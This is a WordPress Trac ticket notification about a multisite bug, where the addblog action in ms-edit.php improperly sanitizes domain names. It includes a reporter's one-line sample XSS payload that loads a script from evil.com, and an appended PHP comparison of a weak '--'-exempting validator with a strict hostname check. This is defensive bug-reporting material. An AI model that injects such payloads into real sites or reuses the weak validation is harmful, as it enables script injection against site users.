[wp-trac] [WordPress Trac] #11777: ms-edit.php / addblog action improperly sanitizes domains

WordPress Trac wp-trac at lists.automattic.com
Sat Mar 20 00:24:58 UTC 2010


#11777: ms-edit.php / addblog action improperly sanitizes domains
-------------------------------+--------------------------------------------
 Reporter:  Denis-de-Bernardy  |        Owner:  ryan  
     Type:  defect (bug)       |       Status:  closed
 Priority:  normal             |    Milestone:  3.0   
Component:  Security           |      Version:  3.0   
 Severity:  normal             |   Resolution:  fixed 
 Keywords:  multisite          |  
-------------------------------+--------------------------------------------

Comment(by Denis-de-Bernardy):

 Doesn't r13630 allow a completely unsanitized domain name to go in,
 provided it contains -- in it? Such as:

 {{{
 evil--<script src="http://evil.com/xss.js"></script>
 }}}

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/11777#comment:7>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
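
An added illustration of the pattern the comment above asks about, not code from this page or from WordPress (the r13630 change itself is not shown here): a validator that exempts any input containing `--`, beside a check applied to every hostname label. The function names and sample inputs are hypothetical.

```php
<?php
// Added illustration; function names are hypothetical and this is not WordPress code.

// Weak pattern: a substring test for "--" (for example, to let punycode-style
// labels through) returns the raw input and skips the character check entirely.
function weak_domain_check( $domain ) {
    if ( strpos( $domain, '--' ) !== false ) {
        return $domain; // unsanitized on this branch
    }
    return preg_match( '/^[a-z0-9-]+$/i', $domain ) ? strtolower( $domain ) : false;
}

// Stricter pattern: every dot-separated label must be 1-63 letters, digits or
// hyphens and must not start or end with a hyphen. "--" is accepted only as
// ordinary hyphens inside such a label, so it grants no exemption.
function strict_domain_check( $domain ) {
    $domain = strtolower( trim( $domain ) );
    if ( $domain === '' || strlen( $domain ) > 253 ) {
        return false;
    }
    foreach ( explode( '.', $domain ) as $label ) {
        if ( ! preg_match( '/^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/D', $label ) ) {
            return false;
        }
    }
    return $domain;
}

// Constructed sample inputs; the second is the string quoted in the comment.
$samples = array(
    'blog1',
    'evil--<script src="http://evil.com/xss.js"></script>',
    'xn--bcher-kva.example',
    '-leading.example',
);

foreach ( $samples as $s ) {
    printf(
        "%-55s weak=%-5s strict=%s\n",
        $s,
        weak_domain_check( $s ) === false ? 'no' : 'yes',
        strict_domain_check( $s ) === false ? 'no' : 'yes'
    );
}
```

The weak check accepts the quoted string because of the `--` branch, while the strict check rejects it and still accepts the constructed `xn--` label. Input validation of this kind complements escaping the stored value wherever it is later written into HTML; it does not replace it.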

